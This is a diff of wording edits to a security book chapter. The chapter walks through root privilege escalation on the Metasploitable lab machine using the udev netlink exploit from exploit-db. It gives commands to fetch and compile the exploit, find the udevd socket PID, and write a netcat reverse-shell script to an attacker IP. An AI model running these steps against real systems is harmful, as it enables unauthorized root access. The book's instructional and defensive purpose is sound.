binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 G> `mount`
 G> Shows us that we have very little in the way of granular partitioning and we have `/` mounted as `rw`, so as a low privileged user, we can both write and execute files in `/tmp` for example.
 G>
-G> We could also just search for "Privilege Escalation" exploits targeting our targets kernel.
+G> We could also just search for "Privilege Escalation" exploits targeting our target's kernel.
-G> Let us get the targets Kernel version: `uname -a` produces:
+G> Echo the target's kernel version: `uname -a` produces:
 G> `2.6.24`
 G>
-G> This ([https://www.exploit-db.com/exploits/8572/](https://www.exploit-db.com/exploits/8572/)) looks like an interesting one.
+G> This ([https://www.exploit-db.com/exploits/8572/](https://www.exploit-db.com/exploits/8572/)) looks like an interesting target.
 Can we compile this on the target though?
-Let us see if we have `gcc` handy:
+Do we have `gcc` handy:
 G> `dpkg -l gcc`
 G> We do.

 {icon=bomb}
 G>
 G> udev is a device manager running as root for the Linux kernel.
 Before version 1.4.1 it did not verify whether a netlink message originated from kernel or user space,
-G> which allowed users to supply their own, which we see in the exploit:
+G> which allowed users to supply their own, as seen in the exploit:
 G> `sendmsg(sock, &msg, 0);`
 G>
-G> The exploit will run our payload that we will create soon which will open a reverse root shell (because udev is running as root) back to our attacking box.
+G> This exploit will run the payload that we will create momentarily, which will open a reverse root shell (because udev is running as root) back to our attacking box.
 G> We need to pass the PID of the netlink socket as an argument.
-G> When a device is removed, the exploit leverages the `95-udev-late.rules` functionality which runs arbitrary commands (which we are about to create in `/tmp/run`) via the `REMOVE_CMD` in the exploit.
+G> When a device is removed, the exploit leverages the `95-udev-late.rules` functionality, which runs arbitrary commands (which we are about to create in `/tmp/run`) via the `REMOVE_CMD` in the exploit.
 G> You can also see within the exploit that it adds executable permissions to our reverse shell payload.
-Now if we had `/tmp` mounted as we do in the `/etc/fstab` in the Countermeasures section, neither `/tmp/run` or `/tmp/privesc` would be able to execute.
+If only we had `/tmp` mounted as we do in the `/etc/fstab` in the Countermeasures section, neither `/tmp/run` or `/tmp/privesc` would be able to execute.
 G>
-G> Through our daemon shell that `distcc_exec` provided, let us fetch the exploit:
+G> Through our daemon shell that `distcc_exec` provided, let's fetch the exploit:
 G> `wget --no-check-certificate https://www.exploit-db.com/download/8572 -O privesc.c`
-G> The `no-check` is required because metasploitable does not have the relevant CA cert installed.
+G> The `no-check` is required because Metasploitable does not have the relevant CA cert installed.
 G> Now check that the file has the contents that you expect.
 G> `cat privesc.c`
 G>
-G> Let us compile it:
+G> Compile it:
 G> `gcc privesc.c -o privesc`
 G> `ls -liah`
 G> `privesc`
 G>
-G> Now we need the PID of the udevd netlink socket
+G> We need the PID of the udevd netlink socket
 G> `cat /proc/net/netlink`
-G> Gives us `2299`
+G> gives us `2299`
 G> And to check:
 G> `ps -aux | grep udev`
-G> Gives us `2300` which should be one more than netlink.
+G> gives us `2300` which should be one more than netlink.
 G>
-G> Now we need something on the target to use to open a reverse shell.
+G> We need something on the target to use to open a reverse shell.
 Netcat may not be available on a production web server, but if it is:
 G> Open a connection to 192.168.0.12:1234, then run `/bin/bash`
 G> `echo '#!/bin/bash' > run`
 G> `echo '/bin/netcat -e /bin/bash 192.168.0.12 1234' >> run`